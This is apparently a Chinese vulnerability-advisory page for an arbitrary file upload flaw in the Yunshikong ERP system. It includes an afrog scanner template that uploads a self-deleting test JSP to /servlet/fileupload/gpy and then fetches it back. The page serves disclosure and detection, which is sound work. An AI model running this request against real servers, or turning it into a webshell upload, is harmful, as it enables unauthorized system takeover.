yunshikong-erp-file-upload: 云时空ERP文件上传

日期: 2025-09-01 | 影响软件: yunshikong-erp-file-upload | POC: 已公开

漏洞描述

云时空社会化商业ERP系统接口/servlet/fileupload/gpy存在任意文件上传漏洞,通过此漏洞,攻击者可上传webshell获取系统权限。 app="云时空社会化商业ERP系统"

PoC代码[已公开]

id: yunshikong-erp-file-upload

info:
  name: 云时空ERP文件上传
  author: laohuan12138
  severity: critical
  verified: true
  description: |
    云时空社会化商业ERP系统接口/servlet/fileupload/gpy存在任意文件上传漏洞,通过此漏洞,攻击者可上传webshell获取系统权限。
    app="云时空社会化商业ERP系统"
  reference:
    - https://github.com/wy876/wiki/blob/a6bcd102ae2ceb8a42f2ced7062f9fd937b1cec7/%E4%BA%91%E6%97%B6%E7%A9%BA%E7%A4%BE%E4%BC%9A%E5%8C%96%E5%95%86%E4%B8%9AERP%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.md?plain=1#L10
  tags: yunshikong,fileupload
  created: 2024/01/04

set:
  r3: randomInt(40000, 44800)
  r4: randomInt(40000, 44800)
  randname: randomLowercase(6)
  fileth: year(0) + "-" + month(0) + "-" + day(0)
  q: replaceAll(fileth,"-0","-")
  rboundary: randomLowercase(8)
rules:
  r1:
    request:
      method: POST
      path: /servlet/fileupload/gpy
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randname}}.jsp\"\r\nContent-Type: application/octet-stream\r\n\r\n<% out.print({{r3}} * {{r4}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\r\n------WebKitFormBoundary{{rboundary}}--\r\n"
    expression: response.status == 200

  r2:
    request:
      method: GET
      path: /uploads/pics/{{q}}/{{randname}}.jsp
    expression: response.status == 200 && response.body.bcontains(bytes(string(r3 * r4)))
expression: r1() && r2()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/yunshikong-erp-file-upload.yaml

相关漏洞推荐